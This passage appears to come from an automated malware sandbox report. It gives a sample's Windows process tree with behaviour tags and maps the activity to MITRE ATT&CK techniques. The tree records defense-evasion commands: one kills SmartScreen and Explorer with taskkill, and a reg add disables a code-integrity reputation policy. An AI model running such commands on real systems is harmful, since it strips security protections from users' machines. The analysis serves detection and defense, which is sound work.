    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2736
- - C:\Windows\system32\taskkill.exe
    taskkill /im smartscreen.exe /f
    3⤵
    - Kills process with taskkill
    PID:2512
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f
    3⤵
    PID:3208
- - C:\Windows\system32\control.exe
    control display
    3⤵
    PID:1416
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL display
      4⤵
      PID:3440
- - C:\Windows\system32\control.exe
    control
    3⤵
    PID:1216
- - C:\Windows\system32\control.exe
    control system
    3⤵
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:5640
- - C:\Windows\System32\control.exe
    "C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",
    3⤵
    PID:4724
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
- - C:\Windows\system32\Fondue.exe
    fondue
    3⤵
    PID:5568
- - C:\Windows\system32\msconfig.exe
    msconfig
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:2312
- - C:\Windows\system32\msinfo32.exe
    msinfo32
    3⤵
    - Checks SCSI registry key(s)
    - Enumerates system info in registry
    PID:5600
- - C:\Windows\system32\OptionalFeatures.exe
    optionalfeatures
    3⤵
    PID:564
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: SetClipboardViewer
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2816
- - C:\Windows\system32\slui.exe
    slui.exe
    3⤵
    PID:3468
  - - C:\Windows\system32\slui.exe
      "C:\Windows\system32\slui.exe" 0x03
      4⤵
      PID:6100
    - - C:\Windows\system32\ChangePk.exe
        
        "C:\Windows\system32\ChangePk.exe"
        5⤵
        
        PID:4168
- - C:\Windows\system32\SystemPropertiesAdvanced.exe
    SystemPropertiesAdvanced
    3⤵
    PID:680
- - C:\Windows\system32\SystemPropertiesComputerName.exe
    SystemPropertiesComputerName
    3⤵
    PID:4740
- - C:\Windows\system32\SystemPropertiesDataExecutionPrevention.exe
    SystemPropertiesDataExecutionPrevention
    3⤵
    PID:1620
- - C:\Windows\system32\SystemPropertiesHardware.exe
    SystemPropertiesHardware
    3⤵
    PID:4188
- - C:\Windows\system32\SystemPropertiesPerformance.exe
    SystemPropertiesPerformance
    3⤵
    PID:2852
- - C:\Windows\system32\SystemPropertiesProtection.exe
    SystemPropertiesProtection
    3⤵
    PID:5896
- - C:\Windows\system32\SystemPropertiesRemote.exe
    SystemPropertiesRemote
    3⤵
    PID:5160
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: SetClipboardViewer
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:5772
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\lusrmgr.msc"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: SetClipboardViewer
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
1⤵
PID:4916

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5068

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicePickerUserSvc
1⤵
PID:2888

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:2676

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:1708

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry